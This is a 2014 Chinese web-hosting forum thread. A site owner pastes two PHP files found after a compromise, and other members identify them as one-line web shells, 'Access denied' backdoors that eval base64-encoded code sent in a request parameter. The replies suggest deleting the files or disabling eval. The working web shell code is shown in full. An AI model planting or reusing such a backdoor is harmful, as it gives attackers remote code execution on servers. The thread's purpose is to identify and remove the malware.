全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2999|回复: 8
打印 上一主题 下一主题

网站被挂马,请高手解密挂马文件,谢谢!

[复制链接]
跳转到指定楼层
1#
发表于 2014-3-1 20:33:19 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['f6505580303d77ebafb7a'])!=NULL){eval(base64_decode($_REQUEST['f6505580303d77ebafb7a']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['e6e777baec8cafc7d8f33eadd7f0'])!=NULL){eval(base64_decode($_REQUEST['e6e777baec8cafc7d8f33eadd7f0']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
2#
发表于 2014-3-1 20:37:53 | 只看该作者
有什么好解密的
如果有参数 f6505580303d77ebafb7a,则将参数f6505580303d77ebafb7a的值base64_decode之后转换为可执行代码
(想做什么都可以,只要php有权限的)
否则页面显示 Access denied. 几个字
3#
发表于 2014-3-1 20:45:22 | 只看该作者
这个就是所谓的一句话密码吧?在客户端提交代码执行的
4#
 楼主| 发表于 2014-3-1 20:49:25 | 只看该作者
psdshow 发表于 2014-3-1 20:37
有什么好解密的
如果有参数 f6505580303d77ebafb7a,则将参数f6505580303d77ebafb7a的值base64_decode之后 ...

不是后门程序?
5#
发表于 2014-3-1 20:57:59 | 只看该作者
cxd44 发表于 2014-3-1 20:49
不是后门程序?

一句话木马
不是后门还是什么
6#
 楼主| 发表于 2014-3-1 21:00:29 | 只看该作者
psdshow 发表于 2014-3-1 20:57
一句话木马
不是后门还是什么

那如何防范?
7#
发表于 2014-3-1 21:07:40 | 只看该作者
删除文件 或者禁用eval
8#
 楼主| 发表于 2014-3-1 21:20:27 | 只看该作者
Kvm 发表于 2014-3-1 21:07
删除文件 或者禁用eval

xiexie
9#
发表于 2014-3-1 22:10:31 | 只看该作者
Kvm 发表于 2014-3-1 21:07
删除文件 或者禁用eval

K妹你可真狠,eval都禁……
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-1-12 13:20 , Processed in 0.067365 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表